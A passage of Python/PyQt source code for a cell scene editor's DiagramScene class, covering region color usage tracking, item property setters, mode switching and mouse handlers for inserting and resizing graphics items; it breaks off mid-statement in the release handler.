CDConstants.printOut(\"addToRegionColorsInUse - regionUseDict = \"+str(self.regionUseDict) , CDConstants.DebugTODO )\n        CDConstants.printOut(\"==================================== addToRegionColorsInUse\", CDConstants.DebugTODO )\n\n\n    # ------------------------------------------------------------\n    # 2011 - Mitja: subtract a color from its use by a region in the Cell Scene:\n    # ------------------------------------------------------------\n    def subtractFromRegionColorsInUse(self, pColor):\n        CDConstants.printOut(\"==================================== subtractFromRegionColorsInUse\", CDConstants.DebugTODO )\n\n        # retrieve the region \"name(color)\" dictionary from the table of regions:\n        lRegionsTableDict = self.parentWidget.parentWindow.theTableOfTypes.getRegionsDict()\n        lKeys = lRegionsTableDict.keys()\n        # lColor is the color for which we have to update the use count;\n        #   accept a QBrush as well, since some callers pass an item's brush\n        #   (QtGui.QColor() cannot be constructed directly from a QBrush):\n        if isinstance(pColor, QtGui.QBrush):\n            pColor = pColor.color()\n        lColor = QtGui.QColor(pColor)\n        # lCount is where we temporarily place the count of regions using lColor:\n        lCount = 0\n\n        # find the name corresponding to the subtracted color, and update its entry in the scene's regionUseDict:\n        for i in xrange(len(lRegionsTableDict)) :\n            \n            if lRegionsTableDict[lKeys[i]][0].rgba() == lColor.rgba() :\n\n                # check if there is already an entry for this color in the self.regionUseDict :\n                if lColor.rgba() not in self.regionUseDict:\n                    CDConstants.printOut(\"NO \"+str(lColor.rgba())+\" not in \"+str(self.regionUseDict) , CDConstants.DebugTODO )\n                else:\n                    CDConstants.printOut(\"YES \"+str(lColor.rgba())+\" in \"+str(self.regionUseDict) , CDConstants.DebugTODO )\n                    # decrement the current entry in the self.regionUseDict local dictionary of used colors:\n                    lCount = -1 + self.regionUseDict[ lColor.rgba() ][1]\n                    if (lCount < 1):\n                        del self.regionUseDict[ lColor.rgba() ]\n                        CDConstants.printOut(\"self.regionUseDict no longer has lColor.rgba() = \"+str(lColor.rgba()) , CDConstants.DebugTODO )\n                    else:\n                        self.regionUseDict[ lColor.rgba() ] = [ lRegionsTableDict[lKeys[i]][1], lCount ]\n                        CDConstants.printOut( str(self.regionUseDict[ lColor.rgba() ][0])+\" \"+str(self.regionUseDict[ lColor.rgba() ][1]) , CDConstants.DebugTODO )\n\n        # signal upstream about the updated usage of this region color:\n        self.parentWidget.parentWindow.theTableOfTypes.updateRegionUseOfTableElements(lColor, lCount)\n\n        # if there is at least one color in the regionUseDict table, show the table:\n#         if self.regionUseDict :\n#             # we can test the dict this way because, according to the Python manual,\n#             # \"any empty sequence, for example, '', (), []\" is considered false.\n#             self.parentWidget.signalVisibilityPIFRegionTable.emit(\"Show\")\n        CDConstants.printOut(\"subtractFromRegionColorsInUse - regionUseDict = \"+str(self.regionUseDict) , CDConstants.DebugTODO )\n        CDConstants.printOut(\"==================================== subtractFromRegionColorsInUse\", CDConstants.DebugTODO )\n\n\n\n\n    # ------------------------------------------------------------\n    # 2011 - Mitja: obtain the dict for all the used region colors\n    # ------------------------------------------------------------\n    def getRegionColorsInUse(self):\n        return self.regionUseDict\n\n\n\n\n    # ------------------------------------------------------------\n    # 2011 - Mitja: after obtaining the item's old color (AKA brush)\n    # TODO IS THIS comment meaningful?\n    # TODO: Fix for automatic cell <-> region for TenByTenBox:\n    # ------------------------------------------------------------\n    def setItemRegionOrCell(self, pRegionOrCell):\n        # modeled on setItemColor(), to set the item's region-vs-cell value\n        
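        # A minimal usage sketch, with a hypothetical caller: switching the\n        #   currently selected item to be a single cell rather than a region:\n        #\n        #       scene.setItemRegionOrCell(CDConstants.ItsaCellConst)\n        #\n        #   DiagramItem.setRegionOrCell() (defined above) then swaps the outline\n        #   pen accordingly (darkMagenta for regions, orange for single cells).\n        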
self.myItemRegionOrCell = pRegionOrCell\n        if self.isItemChange(DiagramItem):\n            item = self.selectedItems()[0]\n            item.setRegionOrCell(self.myItemRegionOrCell)\n\n\n    # ------------------------------------------------------------\n    def setItemColor(self, color):\n        self.myItemColor = color\n        if self.isItemChange(DiagramItem):\n            item = self.selectedItems()[0]\n\n            # 2011 - Mitja: after obtaining the item's old color (AKA brush)\n            #   also update the scene's regionUseDict since it contains the list of all\n            #   region colors in use by our scene:\n            lSelectedItemColor = item.brush()\n            self.subtractFromRegionColorsInUse(lSelectedItemColor)\n\n            item.setBrush(self.myItemColor)\n\n            # 2011 - Mitja: after setting the item's color (AKA brush)\n            #   also update the regionUseDict since it contains the list of all\n            #   region colors in use by our scene:\n            self.addToRegionColorsInUse(self.myItemColor)\n\n\n\n\n\n    # ------------------------------------------------------------\n    def setSequenceColor(self, pColor):\n\n        if isinstance(self.theImageSequence, CDImageSequence) == True:\n\n            # 2011 - Mitja: after obtaining the sequence's old color (AKA brush)\n            #   also update the scene's regionUseDict since it contains the list of all\n            #   region colors in use by our scene:\n            lOldColor = self.theImageSequence.getSequenceCurrentColor()\n\n            self.subtractFromRegionColorsInUse(lOldColor)\n\n            self.theImageSequence.setSequenceCurrentColor(pColor)\n\n            # 2011 - Mitja: after setting the sequence's color (AKA brush)\n            #   also update the regionUseDict since it contains the list of all\n            #   region colors in use by our scene:\n            self.addToRegionColorsInUse(pColor)\n\n\n\n    # ------------------------------------------------------------\n    def setLineColor(self, color):\n        self.myLineColor = color\n        if self.isItemChange(Arrow):\n            item = self.selectedItems()[0]\n            item.setColor(self.myLineColor)\n            self.update()\n\n    # ------------------------------------------------------------\n    def setTextColor(self, color):\n        self.myTextColor = color\n        if self.isItemChange(DiagramTextItem):\n            item = self.selectedItems()[0]\n            item.setDefaultTextColor(self.myTextColor)\n\n    # ------------------------------------------------------------\n    def setFont(self, font):\n        self.myFont = font\n        if self.isItemChange(DiagramTextItem):\n            item = self.selectedItems()[0]\n            item.setFont(self.myFont)\n\n    # ------------------------------------------------------------\n    def setMode(self, mode):\n        # 2010 - Mitja: reset resizing unless we are in resizing mode\n        #   and remain in resizing mode:\n        if (self.mySceneMode == CDConstants.SceneModeResizeItem) and \\\n            (mode == CDConstants.SceneModeResizeItem):\n            pass\n        else:\n            self.stopOutlineResizing()\n        self.mySceneMode = mode\n        \n        # 2011 - Mitja: adapt window title to current mode:\n        if self.parentWidget.parentWindow != None:\n            if self.mySceneMode == CDConstants.SceneModeInsertItem:\n                self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Insert Item\")\n            elif self.mySceneMode == CDConstants.SceneModeInsertLine:\n                self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Insert Line\")\n            elif self.mySceneMode == CDConstants.SceneModeInsertText:\n                self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Insert Text\")\n            elif self.mySceneMode == CDConstants.SceneModeMoveItem:\n                self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Move Item\")\n            elif self.mySceneMode == CDConstants.SceneModeInsertPixmap:\n                self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Insert Pixmap\")\n            elif 
self.mySceneMode == CDConstants.SceneModeResizeItem:\n                self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Resize Item\")\n            elif self.mySceneMode == CDConstants.SceneModeImageLayer:\n                self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Image Layer\")\n            elif self.mySceneMode == CDConstants.SceneModeImageSequence:\n                self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Image Sequence\")\n        \n        CDConstants.printOut(\"DiagramScene: setMode (mode==\"+str(mode)+\"). \", CDConstants.DebugVerbose )\n\n        # end of def setMode(self, mode).\n    # ------------------------------------------------------------\n\n\n\n    # ------------------------------------------------------------\n    def getMode(self):\n        return self.mySceneMode\n\n    # ------------------------------------------------------------\n    def setItemType(self, type):\n        self.myItemType = type\n\n    # ------------------------------------------------------------\n    def handlerForLostFocus(self, item):\n        cursor = item.textCursor()\n        cursor.clearSelection()\n        item.setTextCursor(cursor)\n\n        # remove text items that are left empty when they lose focus:\n        if not item.toPlainText():\n            self.removeItem(item)\n            item.deleteLater()\n\n\n    # ------------------------------------------------------------\n    # 2010 - Mitja - we add to mousePressEvent()\n    #   to handle outline-resizing of items and right-button resizing of items\n    # ------------------------------------------------------------\n    def mousePressEvent(self, pMouseEvent, pThePIFItem=None):\n        # 2010 - Mitja: add code for handling insertion of Path items,\n        #   separately from original drawing code: \n\n        # 2011 - Mitja: if in SceneModeImageLayer, then skip all QGraphicsScene\n        #   event processing, and pass the event to theCDImageLayer's own\n        #   mousePressEvent handler... unless it's a Path item's event!\n        if (self.mySceneMode == CDConstants.SceneModeImageLayer) and (pThePIFItem==None):\n            if isinstance(self.theImageLayer, CDImageLayer) == True:\n                self.theImageLayer.mousePressEvent(pMouseEvent)\n\n        elif (pMouseEvent.button() == QtCore.Qt.LeftButton):\n\n            if self.mySceneMode == CDConstants.SceneModeInsertItem:\n                self.stopOutlineResizing()\n                # CDConstants.printOut( \" \"+str( \"mousePressEvent:\", pMouseEvent, pThePIFItem, self.myItemType )+\" \", CDConstants.DebugTODO )\n                # 2010 - Mitja: add code for handling insertion of Path items:\n                if (self.myItemType == DiagramItem.PathConst):\n                    if (pThePIFItem == None) :\n                        # 2010 - Mitja: if there is no Path yet, make it a simple boring one:\n                        # CDConstants.printOut( \" \"+str( \"mousePressEvent, nopath\" )+\" \", CDConstants.DebugTODO )\n                        miBoringPath = QtGui.QPainterPath()\n                        miBoringPath.addEllipse(-100.0, -50.0, 200.0, 100.0)\n                        lPath = miBoringPath\n                    else :\n                        # CDConstants.printOut( \" \"+str( \"mousePressEvent, with PATH\" )+\" \", CDConstants.DebugTODO )\n                        lPath = pThePIFItem.path()\n                    lItem = DiagramItem(lPath, self.myItemMenu)\n                else: \n                    lItem = DiagramItem(self.myItemType, self.myItemMenu)\n                lItem.setBrush(self.myItemColor)\n\n                # 2011 - Mitja: the new item is a region of cells or a single cell:\n                lItem.setRegionOrCell(self.myItemRegionOrCell)\n\n                # 2011 - Mitja: after setting the lItem's color (AKA brush)\n                #   also update the regionUseDict since it contains the list of all\n                #   region colors in use by our scene:\n                self.addToRegionColorsInUse(self.myItemColor)\n\n                # 2011 - Mitja: the \"addItem()\" call is what adds lItem to the scene,\n                #   since without the following call the lItem would never appear:\n                self.addItem(lItem)\n\n                lItem.setPos(pMouseEvent.scenePos())\n                self.signalThatItemInserted.emit(lItem)\n                
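                # A minimal sketch of how a client could react to the two signals\n                #   emitted in this branch (the handler names below are hypothetical,\n                #   not part of this file):\n                #\n                #       def handleItemInserted(pItem):\n                #           CDConstants.printOut(\"inserted item, regionID = \"+str(pItem.getRegionID()), CDConstants.DebugVerbose )\n                #       def handleItemResized(pRect):\n                #           CDConstants.printOut(\"resized rect = \"+str(pRect), CDConstants.DebugVerbose )\n                #       scene.signalThatItemInserted.connect(handleItemInserted)\n                #       scene.signalThatItemResized.connect(handleItemResized)\n                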
lTmpBoundingRect = lItem.sceneBoundingRect()\n self.signalThatItemResized.emit(lTmpBoundingRect)\n\n elif self.mySceneMode == CDConstants.SceneModeInsertLine:\n self.stopOutlineResizing()\n self.line = QtGui.QGraphicsLineItem(QtCore.QLineF(pMouseEvent.scenePos(),\n pMouseEvent.scenePos()))\n self.line.setPen(QtGui.QPen(self.myLineColor, 2))\n self.addItem(self.line)\n\n elif self.mySceneMode == CDConstants.SceneModeInsertText:\n self.stopOutlineResizing()\n textItem = DiagramTextItem()\n textItem.setFont(self.myFont)\n textItem.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)\n textItem.setZValue(1000.0)\n textItem.signalLostFocus.connect(self.handlerForLostFocus)\n textItem.signalSelectedChange.connect(self.handlerForItemSelected)\n self.addItem(textItem)\n textItem.setDefaultTextColor(self.myTextColor)\n textItem.setPos(pMouseEvent.scenePos())\n self.signalThatTextInserted.emit(textItem)\n # 2010 - Mitja: add code for handling insertion of pixmap items:\n elif self.mySceneMode == CDConstants.SceneModeInsertPixmap:\n self.stopOutlineResizing()\n if (pThePIFItem == None) :\n # 2010 - Mitja: if there is no pixmap yet, make it a simple boring one:\n lBoringPixMap = QtGui.QPixmap(128, 128)\n lBoringPixMap.fill( QtGui.QColor(QtCore.Qt.darkGray) )\n lPixmap = lBoringPixMap\n else :\n lPixmap = pThePIFItem.pixmap()\n lItem = DiagramPixmapItem(lPixmap, self.myItemMenu)\n self.addItem(lItem)\n # 2010 - Mitja: add code for handling outline resizing of items:\n elif self.mySceneMode == CDConstants.SceneModeResizeItem:\n # check if there's already a selected resizing item:\n if self.myOutlineResizingItem != None:\n # if the second outline is already ON, act upon vertex proximity:\n self.myOutlineResizingVertex = self.isCloseToOutlineVertex( \\\n self.myOutlineResizingItem, pMouseEvent.scenePos() )\n # check if the mouse click happens near a vertex of the resizing outline:\n if self.myOutlineResizingVertex != \"None\":\n # get ready to resize according to the bounding box's vertex:\n self.myOutlineResizingCurrentX = pMouseEvent.scenePos().x()\n self.myOutlineResizingCurrentY = pMouseEvent.scenePos().y()\n # update the scene to affect redrawing of the selected item's outline\n self.update()\n # passing the mouse event upwards would cause the item to be MOVED by the mouse:\n # super(DiagramScene, self).mousePressEvent(pMouseEvent)\n # so we have to return from this function BEFORE it reaches the super() part below:\n return\n # 2010 - Mitja: implement selection of a second outline to resize items:\n lItemAt = self.itemAt(pMouseEvent.scenePos())\n # CDConstants.printOut( \" \"+str( \"lItemAt =\", lItemAt )+\" \", CDConstants.DebugTODO )\n # if we haven't clicked on a QGraphicsItem, there isn't anything to do here:\n if isinstance( lItemAt, QtGui.QGraphicsItem ) != True:\n self.stopOutlineResizing()\n else:\n # if the second outline is ON and the mouse click is not on the\n # currently selected item, then deselect the second outline\n # but keep processing:\n if lItemAt != self.myOutlineResizingItem:\n self.stopOutlineResizing()\n # we've clicked on a different QGraphicsItem than the one resizing,\n # so select the newly clicked item for resizing:\n self.myOutlineResizingItem = lItemAt\n # update the scene, i.e. 
have the view repaint it:\n # self.update()\n\n # 2010 - Mitja: pass the mouse event upwards, so that it may be moved:\n super(DiagramScene, self).mousePressEvent(pMouseEvent)\n\n # 2010 - Mitja: handle the insertion of Path items:\n # we execute this part only IF the mousePressEvent is generated by our code\n # (i.e. there is no mouse button pressed: we just called this function directly!)\n elif (pMouseEvent.button() == QtCore.Qt.NoButton):\n\n lPath = pThePIFItem.path()\n lItem = DiagramItem(lPath, self.myItemMenu)\n\n # check if pThePIFItem's color has the \"magic\" RGBA value=0,0,0,0\n # which means it's from a Freehand or Polygon drawing, and it has\n # to be assigned the currently selected scene color:\n lRGBAValue = pThePIFItem.brush().color().rgba()\n # CDConstants.printOut( \" \"+str( \"pThePIFItem.brush().color().rgba() =\", lRGBAValue )+\" \", CDConstants.DebugTODO )\n if (lRGBAValue == 0):\n # we use this code if we want to assign a new color to the arriving pThePIFItem:\n lItem.setBrush(self.myItemColor)\n else:\n lItem.setBrush(pThePIFItem.brush())\n\n\n # 2011 - Mitja: the new item is a region of cells or a single cell:\n lRGBAValue = pThePIFItem.pen().color().rgba()\n if ( lRGBAValue == QtGui.QColor(QtCore.Qt.darkMagenta).rgba() ) or \\\n ( lRGBAValue == QtGui.QColor(255, 153, 0).rgba() ):\n # new item's pen color corresponding to either region or cell:\n pass\n else:\n # new item's pen color invalid, set it to be the current selection:\n lItem.setRegionOrCell(self.myItemRegionOrCell)\n\n self.addItem(lItem)\n\n # 2011 - Mitja: after setting the lItem's color (AKA brush)\n # also update the regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.addToRegionColorsInUse(lItem.brush())\n\n # scenePos() doesn't seem to exist for pMouseEvent, so this won't work:\n # lItem.setPos(pMouseEvent.scenePos())\n # but since the Path item we get from picking the image is not 0-centered,\n # its coordinates are already scene coordinates (not good for scaling!)\n # so at the moment we don't need scenePos()\n # TODO: fix image picking so that objects are 0-centered + have an offset\n\n # first unselect all selected items in the scene:\n for anItem in self.selectedItems():\n anItem.setSelected(False)\n # then select the currently created Path item:\n lItem.setSelected(True)\n\n # do not emit any signal when creating items from the image layer:\n # self.signalThatItemInserted.emit(lItem)\n\n # except:\n # # we got exception to setBrush(), therefore pThePIFItem is NOT a QGraphicsPathItem!\n # # TODO TODO TODO: MAYBE?\n # pass\n # self.addItem(pThePIFItem)\n # # pThePIFItem.setPos(pMouseEvent.scenePos())\n # self.signalThatItemInserted.emit(pThePIFItem)\n # 2010 - Mitja: pass the mouse event upwards:\n # TODO TODO TODO: MAYBE?\n # super(DiagramScene, self).mousePressEvent(pMouseEvent)\n\n # 2010 - Mitja: implement resizing of items in real-time by right-clicking on them:\n elif (pMouseEvent.button() == QtCore.Qt.RightButton):\n lItemAt = self.itemAt(pMouseEvent.scenePos())\n if isinstance( lItemAt, QtGui.QGraphicsItem ):\n lColor = lItemAt.brush().color().rgba()\n self.myRightButtonResizingItem = lItemAt\n self.myRightButtonResizingClickX = pMouseEvent.scenePos().x()\n self.myRightButtonResizingClickY = pMouseEvent.scenePos().y()\n # CDConstants.printOut( \" \"+str( \"mousePressEvent mousePressEvent mousePressEvent =\", pMouseEvent )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"myRightButtonResizingItem myRightButtonResizingItem 
myRightButtonResizingItem =\", self.myRightButtonResizingItem )+\" \", CDConstants.DebugTODO )\n                # CDConstants.printOut( \" \"+str( \"lColor lColor lColor =\", lColor )+\" \", CDConstants.DebugTODO )\n                # CDConstants.printOut( \" \"+str( \"x, y =\", self.myRightButtonResizingClickX, self.myRightButtonResizingClickY )+\" \", CDConstants.DebugTODO )\n            else:\n                self.myRightButtonResizingItem = None\n                self.myRightButtonResizingClickX = -1.0\n                self.myRightButtonResizingClickY = -1.0\n            # passing the mouse event upwards would cause the item to be MOVED by the mouse:\n            # super(DiagramScene, self).mousePressEvent(pMouseEvent)\n        else:\n            return\n\n\n    # ------------------------------------------------------------\n    # 2010 - Mitja - we add more code to mouseMoveEvent()\n    #   to handle outline-resizing of items and right-button resizing of items,\n    #   and (2011) SceneModeImageLayer support as well...\n    # ------------------------------------------------------------\n    def mouseMoveEvent(self, pMouseEvent):\n\n        # 2011 - Mitja: if in SceneModeImageLayer, then skip all QGraphicsScene\n        #   event processing, and pass the event to theCDImageLayer's own\n        #   mouseMoveEvent handler:\n        if (self.mySceneMode == CDConstants.SceneModeImageLayer):\n            if isinstance(self.theImageLayer, CDImageLayer) == True:\n                self.theImageLayer.mouseMoveEvent(pMouseEvent)\n\n        # 2010 - Mitja: implement right-clicking on items,\n        #   to resize them in real-time:\n        elif self.myRightButtonResizingItem != None:\n            if (self.myRightButtonResizingClickX >= 0.0):\n                prevX = self.myRightButtonResizingClickX\n                prevY = self.myRightButtonResizingClickY\n                self.myRightButtonResizingClickX = pMouseEvent.scenePos().x()\n                self.myRightButtonResizingClickY = pMouseEvent.scenePos().y()\n            else:\n                prevX = pMouseEvent.scenePos().x()\n                prevY = pMouseEvent.scenePos().y()\n                self.myRightButtonResizingClickX = pMouseEvent.scenePos().x()\n                self.myRightButtonResizingClickY = pMouseEvent.scenePos().y()\n\n            sx = (self.myRightButtonResizingClickX - prevX) / 300.0\n            sy = (self.myRightButtonResizingClickY - prevY) / 300.0\n\n            self.myRightButtonResizingItem.myScaleX = self.myRightButtonResizingItem.myScaleX + sx\n            self.myRightButtonResizingItem.myScaleY = self.myRightButtonResizingItem.myScaleY - sy\n\n            # calling setScale() directly on a QGraphicsItem WORKS but it can only scale\n            #   proportionally, and we want to scale x/y independently so we don't use it:\n            # self.myRightButtonResizingItem.setScale( self.myRightButtonResizingItem.myScaleY )\n\n            # using QTransform, we first create a transformation, then we apply it to the item:\n            lTransform = QtGui.QTransform()\n            lTransform.scale( self.myRightButtonResizingItem.myScaleX, self.myRightButtonResizingItem.myScaleY )\n            self.myRightButtonResizingItem.setTransform( lTransform )\n\n            # even though setTransform and setTransformations sound similar, they are two\n            #   DIFFERENT transformation mechanisms provided by Qt... confusing or what?!?\n            #   using setTransformations does not work this way, so we can't use it here:\n            # self.myRightButtonResizingItem.setTransformations( lTransform )\n\n            # even though QTransform and QGraphicsTransform sound similar, they are two\n            #   DIFFERENT transformation mechanisms provided by Qt... 
confusing or what?!?\n            #   using QGraphicsTransform does not work this way, so we can't use it here:\n            # lQGraphicsScale = QtGui.QGraphicsScale()\n            # lQGraphicsScale.setOrigin(QtGui.QVector3D(QtCore.QPointF(60,30)))\n            # lQGraphicsScale.setXScale( self.myRightButtonResizingItem.myScaleX )\n            # lQGraphicsScale.setYScale( self.myRightButtonResizingItem.myScaleY )\n            # self.myRightButtonResizingItem.setTransformations( [ lQGraphicsScale ] )\n\n            # calling scale() directly on a QGraphicsItem existed in Qt 3.3, but it\n            #   has been deprecated in Qt 4.x, so we can't use it:\n            # self.myRightButtonResizingItem.scale( self.myRightButtonResizingItem.myScaleX, self.myRightButtonResizingItem.myScaleY )\n\n            # CDConstants.printOut( \" \"+str( \"pMouseEvent.scenePos().x(), self.myRightButtonResizingClickX, sx, self.myRightButtonResizingItem.myScaleX =\", pMouseEvent.scenePos().x(), self.myRightButtonResizingClickX, sx, self.myRightButtonResizingItem.myScaleX )+\" \", CDConstants.DebugTODO )\n            # CDConstants.printOut( \" \"+str( \"pMouseEvent.scenePos().y(), self.myRightButtonResizingClickY, sy, self.myRightButtonResizingItem.myScaleY =\", pMouseEvent.scenePos().y(), self.myRightButtonResizingClickY, sy, self.myRightButtonResizingItem.myScaleY )+\" \", CDConstants.DebugTODO )\n            # CDConstants.printOut( \" \"+str( \"self.myRightButtonResizingItem.transformations() =\", self.myRightButtonResizingItem.transformations() )+\" \", CDConstants.DebugTODO )\n\n        # 2010 - Mitja: implement a second outline for items, to resize them in real-time:\n        elif (self.mySceneMode == CDConstants.SceneModeResizeItem) and (self.myOutlineResizingItem != None):\n            # use the mouse relative movement (pointer displacement between events) to\n            #   compute the amount of scaling\n            if (self.myOutlineResizingCurrentX >= 0.0):\n                prevX = self.myOutlineResizingCurrentX\n                prevY = self.myOutlineResizingCurrentY\n                self.myOutlineResizingCurrentX = pMouseEvent.scenePos().x()\n                self.myOutlineResizingCurrentY = pMouseEvent.scenePos().y()\n            else:\n                prevX = pMouseEvent.scenePos().x()\n                prevY = pMouseEvent.scenePos().y()\n                self.myOutlineResizingCurrentX = pMouseEvent.scenePos().x()\n                self.myOutlineResizingCurrentY = pMouseEvent.scenePos().y()\n            \n            # we compute scaling using the bounding rectangle and the mouse displacement:\n            dXmouse = (self.myOutlineResizingCurrentX - prevX)\n            dYmouse = (self.myOutlineResizingCurrentY - prevY)\n            lBoundingRect = self.myOutlineResizingItem.sceneBoundingRect()\n            bWidthX = lBoundingRect.bottomRight().x() - lBoundingRect.topLeft().x()\n            bHeightY = lBoundingRect.topRight().y() - lBoundingRect.bottomLeft().y()\n            # CDConstants.printOut( \" \"+str( \" ------------------ lBoundingRect before scaling =\", lBoundingRect )+\" \", CDConstants.DebugTODO )\n\n            # A - compute scaling factors along X and Y according to mouse motion:\n            if self.myOutlineResizingVertex == \"topRight\":\n                sx = (bWidthX + dXmouse) / bWidthX\n                sy = (bHeightY + dYmouse) / bHeightY\n            elif self.myOutlineResizingVertex == \"topLeft\":\n                sx = (bWidthX - dXmouse) / bWidthX\n                sy = (bHeightY + dYmouse) / bHeightY\n            elif self.myOutlineResizingVertex == \"bottomRight\":\n                sx = (bWidthX + dXmouse) / bWidthX\n                sy = (bHeightY - dYmouse) / bHeightY\n            elif self.myOutlineResizingVertex == \"bottomLeft\":\n                sx = (bWidthX - dXmouse) / bWidthX\n                sy = (bHeightY - dYmouse) / bHeightY\n            else:\n                # if we are not resizing the item by dragging one of its corners,\n                #   then pass the event upstream and return right away!\n                super(DiagramScene, self).mouseMoveEvent(pMouseEvent)\n                return\n\n            
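            # Worked example for the \"bottomRight\" case above, with hypothetical\n            #   numbers: for a 200x100 item, bWidthX = 200 and bHeightY = -100\n            #   (negative, because topRight().y() - bottomLeft().y() flips sign in\n            #   Qt's y-down scene coordinates). A drag of dXmouse = +20 and\n            #   dYmouse = +10 then gives:\n            #\n            #       sx = (200 + 20) / 200   = 1.1\n            #       sy = (-100 - 10) / -100 = 1.1\n            #\n            #   i.e. the item grows by 10% along both axes, as expected when\n            #   pulling the bottom-right corner away from the item's center.\n            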
self.myOutlineResizingItem.myScaleX = self.myOutlineResizingItem.myScaleX * sx\n self.myOutlineResizingItem.myScaleY = self.myOutlineResizingItem.myScaleY * sy\n # limit diminishing resizing values so that they won't make the item disappear:\n if (self.myOutlineResizingItem.myScaleX < 0.005) :\n self.myOutlineResizingItem.myScaleX = 0.005\n if (self.myOutlineResizingItem.myScaleY < 0.005) :\n self.myOutlineResizingItem.myScaleY = 0.005\n\n # B - apply the scaling transformation to the item:\n # the use of QTransform is as such: first set the transformation, then\n # apply the transformation to the QGraphicsItem:\n lTransform = QtGui.QTransform()\n lTransform.scale( self.myOutlineResizingItem.myScaleX, self.myOutlineResizingItem.myScaleY )\n self.myOutlineResizingItem.setTransform( lTransform )\n # self.update()\n\n # note: the sceneBoundingRect is NOT updated even after the scaling operation!\n # apparently, Qt will update the QGraphicsItem's sceneBoundingRect at redraw only.\n # so the following operations would get the sceneBoundingRect as *before* scaling:\n # lBoundingRect = self.myOutlineResizingItem.sceneBoundingRect()\n\n # C - now fix the item's position according to the scaling transformation,\n # since we want the fixed-point of the transformation to be the vertex corner\n # at the opposite side of the resizing vertex corner (and not the object's center)\n lItemScenePoint = self.myOutlineResizingItem.scenePos()\n if self.myOutlineResizingVertex == \"topRight\":\n lItemNewPosX = lItemScenePoint.x() - ( (bWidthX - sx * bWidthX) * 0.5 )\n lItemNewPosY = lItemScenePoint.y() - ( (bHeightY - sy * bHeightY) * 0.5 )\n elif self.myOutlineResizingVertex == \"topLeft\":\n lItemNewPosX = lItemScenePoint.x() + ( (bWidthX - sx * bWidthX) * 0.5 )\n lItemNewPosY = lItemScenePoint.y() - ( (bHeightY - sy * bHeightY) * 0.5 )\n elif self.myOutlineResizingVertex == \"bottomRight\":\n lItemNewPosX = lItemScenePoint.x() - ( (bWidthX - sx * bWidthX) * 0.5 )\n lItemNewPosY = lItemScenePoint.y() + ( (bHeightY - sy * bHeightY) * 0.5 )\n elif self.myOutlineResizingVertex == \"bottomLeft\":\n lItemNewPosX = lItemScenePoint.x() + ( (bWidthX - sx * bWidthX) * 0.5 )\n lItemNewPosY = lItemScenePoint.y() + ( (bHeightY - sy * bHeightY) * 0.5 )\n else:\n return\n\n # one has to be careful with setPos() because Qt does NOT provide a function\n # to set a QGraphicsItem's position in scene coordinates, only in *parent*\n # coordinates. So the following setPos() call would FAIL if we had hierarchies\n # of items. As from the Qt online documentation: \"setPos() sets the position of\n # the item to pos, which is in parent coordinates. 
For items with no parent,\n            #   pos is in scene coordinates.\"\n            lItemScenePoint.setX ( lItemNewPosX )\n            lItemScenePoint.setY ( lItemNewPosY )\n            self.myOutlineResizingItem.setPos(lItemScenePoint)\n\n            # CDConstants.printOut( \" \"+str( \"pMouseEvent.scenePos().x(), self.myOutlineResizingCurrentX, sx, self.myOutlineResizingItem.myScaleX =\", pMouseEvent.scenePos().x(), self.myOutlineResizingCurrentX, sx, self.myOutlineResizingItem.myScaleX )+\" \", CDConstants.DebugTODO )\n            # CDConstants.printOut( \" \"+str( \"pMouseEvent.scenePos().y(), self.myOutlineResizingCurrentY, sy, self.myOutlineResizingItem.myScaleY =\", pMouseEvent.scenePos().y(), self.myOutlineResizingCurrentY, sy, self.myOutlineResizingItem.myScaleY )+\" \", CDConstants.DebugTODO )\n            # CDConstants.printOut( \" \"+str( \"self.myOutlineResizingItem.transformations() =\", self.myOutlineResizingItem.transformations() )+\" \", CDConstants.DebugTODO )\n\n        elif self.mySceneMode == CDConstants.SceneModeInsertLine and self.line:\n            newLine = QtCore.QLineF(self.line.line().p1(), pMouseEvent.scenePos())\n            self.line.setLine(newLine)\n\n        elif self.mySceneMode == CDConstants.SceneModeMoveItem:\n            super(DiagramScene, self).mouseMoveEvent(pMouseEvent)\n            # signal to update the moved item's x/y/w/h information display:\n            lAllSelectedItems = self.selectedItems()\n            # make sure that there is at least one selected item:\n            if lAllSelectedItems:\n                # get the first selected item:\n                lFirstSelectedItem = lAllSelectedItems[0]\n                lBoundingRect = lFirstSelectedItem.sceneBoundingRect()\n                self.signalThatItemResized.emit(lBoundingRect)\n\n\n\n\n    # ------------------------------------------------------------\n    # 2010 - Mitja - mouseReleaseEvent() modified to handle both\n    #   outline-resizing of items and right-button resizing of items,\n    #   and (2011) SceneModeImageLayer support as well...\n    # ------------------------------------------------------------\n    def mouseReleaseEvent(self, pMouseEvent):\n\n        # 2010 - Mitja: respond to all release events to stop outline resizing of items:\n        self.myOutlineResizingVertex = \"None\"\n        # update the scene to affect redrawing of the selected item's outline\n        self.update()\n\n        # 2011 - Mitja: if in SceneModeImageLayer, then skip all QGraphicsScene\n        #   event processing, and pass the event to theCDImageLayer's own\n        #   mouseReleaseEvent handler:\n        if (self.mySceneMode == CDConstants.SceneModeImageLayer):\n            if isinstance(self.theImageLayer, CDImageLayer) == True:\n                self.theImageLayer.mouseReleaseEvent(pMouseEvent)\n\n        # 2010 - Mitja: implement right-clicking on items, to resize them in real-time:\n        elif self.myRightButtonResizingItem != None:\n            self.myRightButtonResizingItem = None\n            self.myRightButtonResizingClickX = -1.0\n            self.myRightButtonResizingClickY = -1.0\n            # CDConstants.printOut( \" \"+str( \"mouseReleaseEvent ELSE mouseReleaseEvent ELSE mouseReleaseEvent =\", pMouseEvent )+\" \", CDConstants.DebugTODO )\n            # CDConstants.printOut( \" \"+str( \"myRightButtonResizingItem ELSE myRightButtonResizingItem ELSE myRightButtonResizingItem =\", self.myRightButtonResizingItem )+\" \", CDConstants.DebugTODO )\n            # update the scene to remove the foreground outline:\n            self.update()\n\n\n        elif self.line and self.mySceneMode == CDConstants.SceneModeInsertLine:\n            startItems = 